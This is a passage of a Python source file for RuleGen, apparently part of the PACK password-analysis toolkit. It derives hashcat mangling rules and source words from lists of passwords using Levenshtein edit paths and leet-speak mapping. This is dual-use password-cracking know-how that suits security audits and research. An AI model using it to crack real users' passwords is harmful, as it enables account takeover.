# Insert character X at position N
self.hashcat_rule["i"] = lambda x, y, z: x[:y] + z + x[y:]
######################
# Replacement rules #
######################
# Overwrite character at position N with X
self.hashcat_rule["o"] = lambda x, y, z: x[:y] + z + x[y + 1 :]
# Replace all instances of X with Y
self.hashcat_rule["s"] = lambda x, y, z: x.replace(y, z)
# Bitwise shift left character @ N
self.hashcat_rule["L"] = lambda x, y: x[:y] + chr(ord(x[y]) << 1) + x[y + 1 :]
# Bitwise shift right character @ N
self.hashcat_rule["R"] = lambda x, y: x[:y] + chr(ord(x[y]) >> 1) + x[y + 1 :]
# Increment character @ N by 1 ascii value
self.hashcat_rule["+"] = lambda x, y: x[:y] + chr(ord(x[y]) + 1) + x[y + 1 :]
# Decrement character @ N by 1 ascii value
self.hashcat_rule["-"] = lambda x, y: x[:y] + chr(ord(x[y]) - 1) + x[y + 1 :]
# Replace character @ N with value at @ N plus 1
self.hashcat_rule["."] = lambda x, y: x[:y] + x[y + 1] + x[y + 1 :]
# Replace character @ N with value at @ N minus 1
self.hashcat_rule[","] = lambda x, y: x[:y] + x[y - 1] + x[y + 1 :]
######################
# Swapping rules #
######################
# Swap first two characters
self.hashcat_rule["k"] = lambda x: x[1] + x[0] + x[2:]
# Swap last two characters
self.hashcat_rule["K"] = lambda x: x[:-2] + x[-1] + x[-2]
# Swap character X with Y
self.hashcat_rule["*"] = (
lambda x, y, z: x[:y] + x[z] + x[y + 1 : z] + x[y] + x[z + 1 :]
if z > y
else x[:z] + x[y] + x[z + 1 : y] + x[z] + x[y + 1 :]
)
#######################################################################
# Common numeric and special character substitutions (1337 5p34k)
self.leet = dict()
self.leet["1"] = "i"
self.leet["2"] = "z"
self.leet["3"] = "e"
self.leet["4"] = "a"
self.leet["5"] = "s"
self.leet["6"] = "b"
self.leet["7"] = "t"
self.leet["8"] = "b"
self.leet["9"] = "g"
self.leet["0"] = "o"
self.leet["!"] = "i"
self.leet["|"] = "i"
self.leet["@"] = "a"
self.leet["$"] = "s"
self.leet["+"] = "t"
#######################################################################
# Preanalysis rules to bruteforce for each word
self.preanalysis_rules = []
self.preanalysis_rules.append(([], self.hashcat_rule[":"])) # Blank rule
self.preanalysis_rules.append((["r"], self.hashcat_rule["r"])) # Reverse rule
# self.preanalysis_rules.append((['{'],self.hashcat_rule['}'])) # Rotate left
# self.preanalysis_rules.append((['}'],self.hashcat_rule['{'])) #
# Rotate right
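#######################################################################
# Illustrative rule sketch (standalone, independent of the class above):
# how a few of the hashcat rule lambdas transform a word. The sample word
# "password" and the chosen rules are for illustration only.
def _rule_demo(word="password"):
    return {
        "c": word.capitalize(),                          # c   -> "Password"
        "r": word[::-1],                                 # r   -> "drowssap"
        "$1": word + "1",                                # $1  -> "password1"
        "sa@": word.replace("a", "@"),                   # sa@ -> "p@ssword"
        "T0": word[:0] + word[0].swapcase() + word[1:],  # T0  -> "Password"
    }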
##########################################################################
# Calculate Levenshtein edit path matrix
@staticmethod
def levenshtein(word, password):
matrix = []
# Generate and populate the initial matrix
for i in range(len(password) + 1):
matrix.append([])
for j in range(len(word) + 1):
if i == 0:
matrix[i].append(j)
elif j == 0:
matrix[i].append(i)
else:
matrix[i].append(0)
# Calculate edit distance for each substring
for i in range(1, len(password) + 1):
for j in range(1, len(word) + 1):
if password[i - 1] == word[j - 1]:
matrix[i][j] = matrix[i - 1][j - 1]
else:
insertion = matrix[i - 1][j] + 1
deletion = matrix[i][j - 1] + 1
substitution = matrix[i - 1][j - 1] + 1
matrix[i][j] = min(insertion, deletion, substitution)
return matrix
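##########################################################################
# Worked example (comments only): for word="cat" and password="chat" the
# matrix built by levenshtein() above is shown below; rows follow the
# password, columns follow the word, and the bottom-right cell is the edit
# distance (here 1, i.e. insert the 'h').
#
#           c  a  t
#        0  1  2  3
#     c  1  0  1  2
#     h  2  1  1  2
#     a  3  2  1  2
#     t  4  3  2  1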
def levenshtein_distance(self, s1, s2):
"""Calculate the Levenshtein distance between two strings.
This is straight from Wikipedia.
"""
if len(s1) < len(s2):
return self.levenshtein_distance(s2, s1)
if not s1:
return len(s2)
previous_row = range(len(s2) + 1)
for i, c1 in enumerate(s1):
current_row = [i + 1]
for j, c2 in enumerate(s2):
insertions = previous_row[j + 1] + 1
deletions = current_row[j] + 1
substitutions = previous_row[j] + (c1 != c2)
current_row.append(min(insertions, deletions, substitutions))
previous_row = current_row
return previous_row[-1]
@staticmethod
def levenshtein_print(matrix, word, password):
""" Print word X password matrix """
print(f" {' '.join(list(word))}")
for i, row in enumerate(matrix):
if i == 0:
print(" ", end=" ")
else:
print(password[i - 1], end=" ")
print(" ".join(f"{col for col in row}"))
def generate_levenshtein_rules(self, word, password):
""" Generates levenshtein rules. Returns a list of lists of levenshtein rules. """
# 1) Generate Levenshtein matrix
matrix = self.levenshtein(word, password)
# 2) Trace reverse paths through the matrix.
paths = self.levenshtein_reverse_recursive(
matrix, len(matrix) - 1, len(matrix[0]) - 1, 0
)
# 3) Return a collection of reverse paths.
return [path for path in paths if len(path) <= matrix[-1][-1]]
def levenshtein_reverse_recursive(self, matrix, i, j, path_len):
"""Calculate reverse Levenshtein paths.
Recursive, Depth First, Short-circuited algorithm by Peter Kacherginsky
Generates a list of edit operations necessary to transform a source word
into a password. Edit operations are recorded in the form:
(operation, password_offset, word_offset)
Where an operation can be either insertion, deletion or replacement.
"""
if (i == 0 and j == 0) or path_len > matrix[-1][-1]:
return [[]]
else:
paths = list()
cost = matrix[i][j]
# Calculate minimum cost of each operation
cost_delete = cost_insert = cost_equal_or_replace = sys.maxsize
if i > 0:
cost_insert = matrix[i - 1][j]
if j > 0:
cost_delete = matrix[i][j - 1]
if i > 0 and j > 0:
cost_equal_or_replace = matrix[i - 1][j - 1]
cost_min = min(cost_delete, cost_insert, cost_equal_or_replace)
# Recurse through reverse path for each operation
if cost_insert == cost_min:
insert_paths = self.levenshtein_reverse_recursive(
matrix, i - 1, j, path_len + 1
)
for insert_path in insert_paths:
paths.append(insert_path + [("insert", i - 1, j)])
if cost_delete == cost_min:
delete_paths = self.levenshtein_reverse_recursive(
matrix, i, j - 1, path_len + 1
)
for delete_path in delete_paths:
paths.append(delete_path + [("delete", i, j - 1)])
if cost_equal_or_replace == cost_min:
if cost_equal_or_replace == cost:
equal_paths = self.levenshtein_reverse_recursive(
matrix, i - 1, j - 1, path_len
)
for equal_path in equal_paths:
paths.append(equal_path)
else:
replace_paths = self.levenshtein_reverse_recursive(
matrix, i - 1, j - 1, path_len + 1
)
for replace_path in replace_paths:
paths.append(replace_path + [("replace", i - 1, j - 1)])
return paths
def load_custom_wordlist(self, wordlist_file):
self.enchant = enchant.request_pwl_dict(wordlist_file)
def generate_words(self, password):
""" Generate source word candidates."""
if self.debug:
print(f"[*] Generating source words for {password}")
words = list()
words_collection = list()
# Let's collect best edit distance as soon as possible to prevent
# less efficient pre_rules like reversal and rotation from slowing
# us down with garbage
best_found_distance = 9999
#######################################################################
# Generate words for each preanalysis rule
if not self.brute_rules:
self.preanalysis_rules = self.preanalysis_rules[:1]
for pre_rule, pre_rule_lambda in self.preanalysis_rules:
pre_password = pre_rule_lambda(password)
# Generate word suggestions
if self.word:
suggestions = [self.word]
elif self.simple_words:
suggestions = self.generate_simple_words(pre_password)
else:
suggestions = self.generate_advanced_words(pre_password)
# HACK: Perform some additional expansion on multi-word suggestions
# TODO: Maybe I should split these two and see if I can generate
# rules for each of the suggestions
for suggestion in suggestions[: self.max_words]:
suggestion = suggestion.replace(" ", "")
suggestion = suggestion.replace("-", "")
if suggestion not in suggestions:
suggestions.append(suggestion)
if len(suggestions) != len(set(suggestions)):
print(sorted(suggestions))
print(sorted(set(suggestions)))
for suggestion in suggestions:
distance = self.levenshtein_distance(suggestion, pre_password)
word = dict()
word["suggestion"] = suggestion
word["distance"] = distance
word["password"] = pre_password
word["pre_rule"] = pre_rule
word["best_rule_length"] = 9999
words.append(word)
#######################################################################
# Perform Optimization
for word in sorted(words, key=lambda w: w["distance"], reverse=False):
# Optimize for best distance
if not self.more_words:
if word["distance"] < best_found_distance:
best_found_distance = word["distance"]
elif word["distance"] > best_found_distance:
if self.verbose:
print(
f"[-] {word['suggestion']} => {{edit distance suboptimal: "
f"{word['distance']} ({best_found_distance})}} => {word['password']}"
)
break
# Filter words with too big edit distance
if word["distance"] <= self.max_word_dist:
if self.debug:
print(
f"[+] {word['suggestion']} => {{edit distance: "
f"{word['distance']} ({best_found_distance})}} = > {word['password']}"
)
words_collection.append(word)
else:
if self.verbose:
print(
f"[-] {word['suggestion']} => {{max distance exceeded: "
"{word['distance']} ({self.max_word_dist})}} => {word['password']}"
)
if self.max_words:
words_collection = words_collection[: self.max_words]
return words_collection
def generate_simple_words(self, password):
""" Generate simple words. A simple spellcheck."""
return self.enchant.suggest(password)
def generate_advanced_words(self, password):
"""Generate advanced words.
Perform some additional non-destructive cleaning to help spell-checkers:
1) Remove non-alpha prefixes and appendixes.
2) Perform common pattern matches (e.g. email).
3) Replace non-alpha character substitutions (1337 5p34k)
"""
# Remove non-alpha prefix and/or appendix
insertion_matches = self.password_pattern["insertion"].match(password)
if insertion_matches:
password = insertion_matches.group("password")
# Pattern matches
email_matches = self.password_pattern["email"].match(password)
if email_matches:
password = email_matches.group("password")
# Replace common special character replacements (1337 5p34k)
preanalysis_password = ""
for c in password:
if c in self.leet:
preanalysis_password += self.leet[c]
else:
preanalysis_password += c
password = preanalysis_password
if self.debug:
f"[*] Preanalysis Password: {password}"
return self.enchant.suggest(password)
##########################################################################
# Hashcat specific offset definition 0-9,A-Z
@staticmethod
def int_to_hashcat(n):
if n < 10:
return n
else:
return chr(65 + n - 10)
@staticmethod
def hashcat_to_int(n):
if n.isdigit():
return int(n)
else:
return ord(n) - 65 + 10
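# Illustrative note: hashcat encodes positions 0-9 as the digits '0'-'9' and
# positions 10-35 as 'A'-'Z', so the helpers above map e.g. 4 -> 4 and
# 12 -> 'C', and back again. Tiny standalone round-trip (mirrors the two
# static methods, for illustration only):
def _offset_roundtrip(n):
    encoded = n if n < 10 else chr(65 + n - 10)
    decoded = int(encoded) if str(encoded).isdigit() else ord(encoded) - 65 + 10
    return encoded, decoded  # _offset_roundtrip(12) == ('C', 12)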
def generate_hashcat_rules(self, suggestion, password):
""" Generate hashcat rules. Returns a length sorted list of lists of hashcat rules."""
# 2) Generate Levenshtein Rules
lev_rules = self.generate_levenshtein_rules(suggestion, password)
# 3) Generate Hashcat Rules
hashcat_rules = []
hashcat_rules_collection = []
#######################################################################
# Generate hashcat rule for each levenshtein rule
for lev_rule in lev_rules:
if self.simple_rules:
hashcat_rule = self.generate_simple_hashcat_rules(
suggestion, lev_rule, password
)
else:
hashcat_rule = self.generate_advanced_hashcat_rules(
suggestion, lev_rule, password
)
if hashcat_rule is None:
print(f"[!] Processing FAILED: {suggestion} => ;( => {password}")
print(" Sorry about that, please report this failure to")
print(" the developer: iphelix [at] thesprawl.org")
else:
hashcat_rules.append(hashcat_rule)
best_found_rule_length = 9999
#######################################################################
# Perform Optimization
for hashcat_rule in sorted(hashcat_rules, key=lambda rule: len(rule)):
rule_length = len(hashcat_rule)
if not self.more_rules:
if rule_length < best_found_rule_length:
best_found_rule_length = rule_length
elif rule_length > best_found_rule_length:
if self.verbose:
print(
f"[-] {suggestion} => {{best rule length exceeded: "
f"{rule_length} ({best_found_rule_length})}} => {password}"
)
break
if rule_length <= self.max_rule_len:
hashcat_rules_collection.append(hashcat_rule)
return hashcat_rules_collection
def generate_simple_hashcat_rules(self, word, rules, password):
""" Generate basic hashcat rules using only basic insert,delete,replace rules. """
hashcat_rules = []
if self.debug:
print(f"[*] Simple Processing {word} => {password}")
# Dynamically apply rules to the source word
# NOTE: Special case were word == password this would work as well.
word_rules = word
for (op, p, _w) in rules:
if self.debug:
print(
f"\t[*] Simple Processing Started: "
f"{word_rules} - {' '.join(hashcat_rules)}"
)
if op == "insert":
hashcat_rules.append(f"i{self.int_to_hashcat(p)}{password[p]}")
word_rules = self.hashcat_rule["i"](word_rules, p, password[p])
elif op == "delete":
hashcat_rules.append(f"D{self.int_to_hashcat(p)}")
word_rules = self.hashcat_rule["D"](word_rules, p)
elif op == "replace":
hashcat_rules.append(f"o{self.int_to_hashcat(p)}{password[p]}")
word_rules = self.hashcat_rule["o"](word_rules, p, password[p])
if self.debug:
print(
f"\t[*] Simple Processing Ended: "
f"{word_rules} => {' '.join(hashcat_rules)} => {password}"
)
# Check if rules result in the correct password
if word_rules == password:
return hashcat_rules
else:
if self.debug:
print(
f"[!] Simple Processing FAILED: "
f"{word} => {' '.join(hashcat_rules)} => {password} ({word_rules})"
)
return None
def generate_advanced_hashcat_rules(self, word, rules, password):
""" Generate advanced hashcat rules using full range of available rules. """
hashcat_rules = []
if self.debug:
print(f"[*] Advanced Processing {word} => {password}")
# Dynamically apply and store rules in word_rules variable.
# NOTE: Special case where word == password this would work as well.
word_rules = word
# Generate case statistics
password_lower = len([c for c in password if c.islower()])
password_upper = len([c for c in password if c.isupper()])
for i, (op, p, w) in enumerate(rules):
if self.debug:
print(
f"\t[*] Advanced Processing Started: "
f"{word_rules} - {' '.join(hashcat_rules)}"
)
if op == "insert":
hashcat_rules.append(f"i{self.int_to_hashcat(p)}{password[p]}")
word_rules = self.hashcat_rule["i"](word_rules, p, password[p])
elif op == "delete":
hashcat_rules.append(f"D{self.int_to_hashcat(p)}")
word_rules = self.hashcat_rule["D"](word_rules, p)
elif op == "replace":
# Detecting global replacement such as sXY, l, u, C, c is a non
# trivial problem because different characters may be added or
# removed from the word by other rules. A reliable way to solve
# this problem is to apply all of the rules the source word
# and keep track of its state at any given time. At the same
# time, global replacement rules can be tested by completing
# the rest of the rules using a simplified engine.
# The sequence of if statements determines the priority of
# rules
# This rule was made obsolete by a prior global replacement
if word_rules[p] == password[p]:
if self.debug:
print(
f"\t[*] Advanced Processing Obsolete Rule: "
f"{word_rules} - {' '.join(hashcat_rules)}"
)
# Swapping rules
elif (
p < len(password) - 1
and p < len(word_rules) - 1
and word_rules[p] == password[p + 1]
and word_rules[p + 1] == password[p]
):
# Swap first two characters
if p == 0 and self.generate_simple_hashcat_rules(
self.hashcat_rule["k"](word_rules), rules[i + 1 :], password
):
hashcat_rules.append("k")
word_rules = self.hashcat_rule["k"](word_rules)
# Swap last two characters
elif p == len(
word_rules
) - 2 and self.generate_simple_hashcat_rules(
self.hashcat_rule["K"](word_rules), rules[i + 1 :], password
):
hashcat_rules.append("K")
word_rules = self.hashcat_rule["K"](word_rules)
# Swap any two characters (only adjacent swapping is
# supported)
elif self.generate_simple_hashcat_rules(
self.hashcat_rule["*"](word_rules, p, p + 1),
rules[i + 1 :],
password,
):
hashcat_rules.append(
f"*{self.int_to_hashcat(p)}{self.int_to_hashcat(p + 1)}"
)
word_rules = self.hashcat_rule["*"](word_rules, p, p + 1)
else:
hashcat_rules.append(f"o{self.int_to_hashcat(p)}{password[p]}")
word_rules = self.hashcat_rule["o"](word_rules, p, password[p])
# Case Toggle: Uppercased a letter
elif word_rules[p].islower() and word_rules[p].upper() == password[p]:
# Toggle the case of all characters in word (mixed cases)
if (
password_upper
and password_lower
and self.generate_simple_hashcat_rules(
self.hashcat_rule["t"](word_rules), rules[i + 1 :], password
)
):
hashcat_rules.append("t")
word_rules = self.hashcat_rule["t"](word_rules)
# Capitalize all letters
elif self.generate_simple_hashcat_rules(
self.hashcat_rule["u"](word_rules), rules[i + 1 :], password
):
hashcat_rules.append("u")
word_rules = self.hashcat_rule["u"](word_rules)
# Capitalize the first letter
elif p == 0 and self.generate_simple_hashcat_rules(
self.hashcat_rule["c"](word_rules), rules[i + 1 :], password
):
hashcat_rules.append("c")
word_rules = self.hashcat_rule["c"](word_rules)
# Toggle the case of characters at position N
else:
hashcat_rules.append(f"T{self.int_to_hashcat(p)}")
word_rules = self.hashcat_rule["T"](word_rules, p)
# Case Toggle: Lowercased a letter
elif word_rules[p].isupper() and word_rules[p].lower() == password[p]:
# Toggle the case of all characters in word (mixed cases)
if (
password_upper
and password_lower
and self.generate_simple_hashcat_rules(
self.hashcat_rule["t"](word_rules), rules[i + 1 :], password
)
):
hashcat_rules.append("t")
word_rules = self.hashcat_rule["t"](word_rules)
# Lowercase all letters
elif self.generate_simple_hashcat_rules(
self.hashcat_rule["l"](word_rules), rules[i + 1 :], password
):
hashcat_rules.append("l")
word_rules = self.hashcat_rule["l"](word_rules)
# Lowercase the first found character, uppercase the rest
elif p == 0 and self.generate_simple_hashcat_rules(
self.hashcat_rule["C"](word_rules), rules[i + 1 :], password
):
hashcat_rules.append("C")
word_rules = self.hashcat_rule["C"](word_rules)
# Toggle the case of characters at position N
else:
hashcat_rules.append(f"T{self.int_to_hashcat(p)}")
word_rules = self.hashcat_rule["T"](word_rules, p)
# Special case substitution of 'all' instances (1337 $p34k)
elif (
word_rules[p].isalpha()
and not password[p].isalpha()
and self.generate_simple_hashcat_rules(
self.hashcat_rule["s"](word_rules, word_rules[p], password[p]),
rules[i + 1 :],
password,
)
):
# If we have already detected this rule, then skip it thus
# reducing total rule count.
# BUG: Elisabeth => sE3 sl1 u o3Z sE3 => 31IZAB3TH
# if not "s%s%s" % (word_rules[p],password[p]) in
# hashcat_rules:
hashcat_rules.append(f"s{word_rules[p]}{password[p]}")
word_rules = self.hashcat_rule["s"](
word_rules, word_rules[p], password[p]
)
# Replace next character with current
elif (
p < len(password) - 1
and p < len(word_rules) - 1
and password[p] == password[p + 1]
and password[p] == word_rules[p + 1]
):
hashcat_rules.append(f".{self.int_to_hashcat(p)}")
word_rules = self.hashcat_rule["."](word_rules, p)
# Replace previous character with current
elif (
p > 0
and w > 0
and password[p] == password[p - 1]
and password[p] == word_rules[p - 1]
):
hashcat_rules.append(f",{self.int_to_hashcat(p)}")
word_rules = self.hashcat_rule[","](word_rules, p)
# ASCII increment
elif ord(word_rules[p]) + 1 == ord(password[p]):
hashcat_rules.append(f"+{self.int_to_hashcat(p)}")
word_rules = self.hashcat_rule["+"](word_rules, p)
# ASCII decrement
elif ord(word_rules[p]) - 1 == ord(password[p]):
hashcat_rules.append(f"-{self.int_to_hashcat(p)}")
word_rules = self.hashcat_rule["-"](word_rules, p)
# SHIFT left
elif ord(word_rules[p]) << 1 == ord(password[p]):
hashcat_rules.append(f"L{self.int_to_hashcat(p)}")
word_rules = self.hashcat_rule["L"](word_rules, p)
# SHIFT right
elif ord(word_rules[p]) >> 1 == ord(password[p]):
hashcat_rules.append(f"R{self.int_to_hashcat(p)}")
word_rules = self.hashcat_rule["R"](word_rules, p)
# Position based replacements.
else:
hashcat_rules.append(f"o{self.int_to_hashcat(p)}{password[p]}")
word_rules = self.hashcat_rule["o"](word_rules, p, password[p])
if self.debug:
print(
f"\t[*] Advanced Processing Ended: "
f"{word_rules} {' '.join(hashcat_rules)}"
)
#######################################################################
# Prefix rules
last_prefix = 0
prefix_rules = list()
for hashcat_rule in hashcat_rules:
if (
hashcat_rule[0] == "i"
and self.hashcat_to_int(hashcat_rule[1]) == last_prefix
):
prefix_rules.append(f"^{hashcat_rule[2]}")
last_prefix += 1
elif len(prefix_rules):
hashcat_rules = prefix_rules[::-1] + hashcat_rules[len(prefix_rules) :]
break
else:
break
else:
hashcat_rules = prefix_rules[::-1] + hashcat_rules[len(prefix_rules) :]
####################################################################
# Appendix rules
last_appendix = len(password) - 1
appendix_rules = list()
for hashcat_rule in hashcat_rules[::-1]:
if (
hashcat_rule[0] == "i"
and self.hashcat_to_int(hashcat_rule[1]) == last_appendix
):
appendix_rules.append(f"${hashcat_rule[2]}")
last_appendix -= 1
elif len(appendix_rules):
hashcat_rules = (
hashcat_rules[: -len(appendix_rules)] + appendix_rules[::-1]
)
break
else:
break
else:
hashcat_rules = hashcat_rules[: -len(appendix_rules)] + appendix_rules[::-1]
####################################################################
# Truncate left rules
last_precut = 0
precut_rules = list()
for hashcat_rule in hashcat_rules:
if (
hashcat_rule[0] == "D"
and self.hashcat_to_int(hashcat_rule[1]) == last_precut
):
precut_rules.append("[")
elif len(precut_rules):
hashcat_rules = precut_rules[::-1] + hashcat_rules[len(precut_rules) :]
break
else:
break
else:
hashcat_rules = precut_rules[::-1] + hashcat_rules[len(precut_rules) :]
####################################################################
# Truncate right rules
last_postcut = len(password)
postcut_rules = list()
for hashcat_rule in hashcat_rules[::-1]:
if (
hashcat_rule[0] == "D"
and self.hashcat_to_int(hashcat_rule[1]) >= last_postcut
):
postcut_rules.append("]")
elif len(postcut_rules):
hashcat_rules = (
hashcat_rules[: -len(postcut_rules)] + postcut_rules[::-1]
)
break
else:
break
else:
hashcat_rules = hashcat_rules[: -len(postcut_rules)] + postcut_rules[::-1]
# Check if rules result in the correct password
if word_rules == password:
return hashcat_rules
else:
if self.debug:
print(
f"[!] Advanced Processing FAILED: "
f"{word} => {' '.join(hashcat_rules)} => {password} ({word_rules})"
)
return None
def check_reversible_password(self, password):
""" Check whether the password is likely to be reversed successfuly. """
# Skip all numeric passwords
if password.isdigit():
if self.verbose and not self.quiet:
print(f"[!] {password} => {{skipping numeric}} => {password}")
self.numeric_stats_total += 1
return False
# Skip passwords with less than 25% of alpha character
# TODO: Make random word detection more reliable based on word entropy.
elif len([c for c in password if c.isalpha()]) < len(password) // 4:
if self.verbose and not self.quiet:
print(
f"[!] {password} => {{skipping alpha less than 25%}} => {password}"
)
self.special_stats_total += 1
return False
# Only check english ascii passwords for now
# TODO: Add support for more languages.
elif [c for c in password if ord(c) < 32 or ord(c) > 126]:
if self.verbose and not self.quiet:
print(f"[!] {password} => {{skipping non ascii english}} => {password}")
self.foreign_stats_total += 1
return False
else:
return True
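        # Examples of passwords the checks above reject: "12345678" (all
        # numeric), "a1b2!!!!####$$$$" (less than 25% alphabetic characters),
        # and "pässwörd" (contains characters outside printable ASCII).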
def analyze_password(
self,
password,
rules_queue=multiprocessing.Queue(),
words_queue=multiprocessing.Queue(),
):
""" Analyze a single password. """
if self.verbose:
print(f"[*] Analyzing password: {password}")
words = []
# Short-cut words in the dictionary
if self.enchant.check(password) and not self.word:
word = dict()
word["password"] = password
word["suggestion"] = password
word["hashcat_rules"] = [[]]
word["pre_rule"] = []
word["best_rule_length"] = 9999
words.append(word)
# Generate rules for words not in the dictionary
else:
# Generate source words list
words = self.generate_words(password)
# Generate levenshtein reverse paths for each suggestion
for word in words:
# Generate a collection of hashcat_rules lists
word["hashcat_rules"] = self.generate_hashcat_rules(
word["suggestion"], word["password"]
)
self.print_hashcat_rules(words, password, rules_queue, words_queue)
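        # Flow summary: a password that is already a dictionary word maps to the
        # no-op rule; otherwise candidate source words are generated and a
        # reverse edit path (expressed as hashcat rules) is computed for each
        # candidate before everything is handed to print_hashcat_rules().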
def print_hashcat_rules(self, words, password, rules_queue, words_queue):
best_found_rule_length = 9999
# Sorted list based on rule length
for word in sorted(words, key=lambda w: len(w["hashcat_rules"][0])):
words_queue.put(word["suggestion"])
for hashcat_rule in word["hashcat_rules"]:
rule_length = len(hashcat_rule)
if not self.more_rules:
if rule_length < best_found_rule_length:
best_found_rule_length = rule_length
elif rule_length > best_found_rule_length:
if self.verbose:
print(
f"[-] {word['suggestion']} => "
f"{{best rule length exceeded: {rule_length} "
f"({best_found_rule_length})}} => {password}"
)
break
if rule_length <= self.max_rule_len:
hashcat_rule_str = " ".join(
hashcat_rule + word["pre_rule"] or [":"]
)
if self.verbose:
print(
f"[+] {word['suggestion']} => {hashcat_rule_str} => {password}"
)
rules_queue.put(hashcat_rule_str)
def password_worker(self, i, passwords_queue, rules_queue, words_queue):
if self.debug:
print(f"[*] Password analysis worker [{int(i)}] started.")
try:
while True:
password = passwords_queue.get()
# Interrupted by a Death Pill
if password is None:
break
self.analyze_password(password, rules_queue, words_queue)
except (KeyboardInterrupt, SystemExit):
if self.debug:
print(f"[*] Password analysis worker [{int(i)}] terminated.")
if self.debug:
print(f"[*] Password analysis worker [{int(i)}] stopped.")
def rule_worker(self, rules_queue, output_rules_filename):
""" Worker to store generated rules. """
print(f"[*] Saving rules to {output_rules_filename}")
f = open(output_rules_filename, "w")
if self.debug:
print("[*] Rule worker started.")
try:
while True:
rule = rules_queue.get()
# Interrupted by a Death Pill
if rule is None:
break
f.write(f"{rule}\n")
f.flush()
except (KeyboardInterrupt, SystemExit):
if self.debug:
print("[*] Rule worker terminated.")
f.close()
if self.debug:
print("[*] Rule worker stopped.")
def word_worker(self, words_queue, output_words_filename):
""" Worker to store generated rules. """
print(f"[*] Saving words to {output_words_filename}")
f = open(output_words_filename, "w")
if self.debug:
print("[*] Word worker started.")
try:
while True:
word = words_queue.get()
# Interrupted by a Death Pill
if word is None:
break
f.write(f"{word}\n")
f.flush()
except (KeyboardInterrupt, SystemExit):
if self.debug:
print("[*] Word worker terminated.")
f.close()
if self.debug:
print("[*] Word worker stopped.")
# Analyze passwords file
def analyze_passwords_file(self, passwords_file):
""" Analyze provided passwords file. """
print(f"[*] Analyzing passwords file: {passwords_file} ...")
print("[*] Press Ctrl-C to end execution and generate statistical analysis.")
# Setup queues
passwords_queue = multiprocessing.Queue(self.threads)
rules_queue = multiprocessing.Queue()
words_queue = multiprocessing.Queue()
# Start workers
for i in range(self.threads):
multiprocessing.Process(
target=self.password_worker,
args=(i, passwords_queue, rules_queue, words_queue),
).start()
multiprocessing.Process(
target=self.rule_worker, args=(rules_queue, f"{self.basename}.rule")
).start()
multiprocessing.Process(
target=self.word_worker, args=(words_queue, f"{self.basename}.word")
).start()
# Continue with the main thread
f = open(passwords_file, "r", encoding="latin-1", errors="ignore")
password_count = 0
analysis_start = time.time()
try:
for password in tqdm(f):
if self.verbose is True:
tqdm.disable = True
password = password.rstrip("\r\n")
if len(password) > 0:
# Provide analysis time feedback to the user
if (
not self.quiet
and password_count != 0
and password_count % 5000 == 0
):
                        print(
                            f"[-] Processed {password_count} passwords; skipped "
                            f"{self.numeric_stats_total} all numeric so far "
                            f"({float(self.numeric_stats_total) * 100.0 / float(password_count):.2f}%)"
                        )
password_count += 1
# Perform preliminary checks and add password to the queue
if self.check_reversible_password(password):
passwords_queue.put(password)
except (KeyboardInterrupt, SystemExit):
print("\n[!] Rulegen was interrupted.")
else:
# Signal workers to stop.
for _ in range(self.threads):
passwords_queue.put(None)
# Wait for all of the queued passwords to finish.
while not passwords_queue.empty():
time.sleep(1)
# Signal writers to stop.
rules_queue.put(None)
words_queue.put(None)
f.close()
analysis_time = time.time() - analysis_start
print(
f"[*] Finished processing {int(password_count)} passwords in "
f"{analysis_time:.2f} seconds at the rate of "
f"{(float(password_count) / analysis_time):.2f} p/sec"
)
print(f"[*] Generating statistics for [{self.basename}] rules and words.")
        print(
            f"[-] Skipped {self.numeric_stats_total} all numeric passwords "
            f"({float(self.numeric_stats_total) * 100.0 / float(password_count):.2f}%)"
        )
        print(
            f"[-] Skipped {self.special_stats_total} passwords with less than 25%"
            f" alpha characters ({float(self.special_stats_total) * 100.0 / float(password_count):.2f}%)"
        )
        print(
            f"[-] Skipped {self.foreign_stats_total} passwords with non ascii "
            f"characters ({float(self.foreign_stats_total) * 100.0 / float(password_count):.2f}%)"
        )
# TODO: Counter breaks on large files. uniq -c | sort -rn is still the most
# optimal way.
rules_file = open(f"{self.basename}.rule", "r")
rules_sorted_file = open(f"{self.basename}-sorted.rule", "w")
rules_counter = Counter(rules_file)
rule_counter_total = sum(rules_counter.values())
print("\n[*] Top 10 rules")
rules_i = 0
for (rule, count) in rules_counter.most_common():
rules_sorted_file.write(rule)
if rules_i < 10:
                print(
                    f"[+] {rule.rstrip(NEWLINE)} - {count} "
                    f"({count * 100 / rule_counter_total:.2f}%)"
                )
rules_i += 1
rules_file.close()
rules_sorted_file.close()
words_file = open(f"{self.basename}.word", "r")
words_sorted_file = open(f"{self.basename}-sorted.word", "w")
words_counter = Counter(words_file)
        word_counter_total = sum(words_counter.values())
print("\n[*] Top 10 words")
words_i = 0
for (word, count) in words_counter.most_common():
words_sorted_file.write(word)
if words_i < 10:
                print(
                    f"[+] {word.rstrip(NEWLINE)} - "
                    f"{count} ({count * 100 / word_counter_total:.2f}%)"
                )
words_i += 1
words_file.close()
words_sorted_file.close()
##########################################################################
def verify_hashcat_rules(self, word, rules, password):
f = open(f"{HASHCAT_PATH}/test.rule", "w")
f.write(" ".join(rules))
f.close()
f = open(f"{HASHCAT_PATH}/test.word", "w")
f.write(word)
f.close()
p = subprocess.Popen(
[
f"{HASHCAT_PATH}/hashcat-cli64.bin",
"-r",
f"{HASHCAT_PATH}/test.rule",
"--stdout",
f"{HASHCAT_PATH}/test.word",
],
stdout=subprocess.PIPE,
)
out, err = p.communicate()
out = out.strip()
if out == password:
hashcat_rules_str = " ".join(rules or [":"])
if self.verbose:
print(f"[+] {word} => {hashcat_rules_str} => {password}")
else:
print(
f"[!] Hashcat Verification FAILED: {word} => "
f"{' '.join(rules or [':'])} => {password} ({out})"
)
if __name__ == "__main__":
header = " _ \n"
header += f" RuleGen {VERSION} | |\n"
header += " _ __ __ _ ___| | _\n"
header += r" | '_ \ / _` |/ __| |/ /\n"
header += " | |_) | (_| | (__| < \n"
header += r" | .__/ \__,_|\___|_|\_\\\n"
header += " | | \n"
header += " |_| iphelix@thesprawl.org\n"
header += "\n"
parser = OptionParser("%prog [options] passwords.txt", version=f"%prog {VERSION}")
parser.add_option(
"-b",
"--basename",
help="Output base name. The following files will be generated: "
+ "basename.words, basename.rules and basename.stats",
default="analysis",
metavar="rockyou",
)
parser.add_option(
"-w",
"--wordlist",
help="Use a custom wordlist for rule analysis.",
metavar="wiki.dict",
)
parser.add_option(
"-q",
"--quiet",
action="store_true",
dest="quiet",
default=False,
help="Don't show headers.",
)
parser.add_option(
"--threads",
type="int",
default=multiprocessing.cpu_count(),
help="Parallel threads to use for processing.",
)
wordtune = OptionGroup(parser, "Fine tune source word generation:")
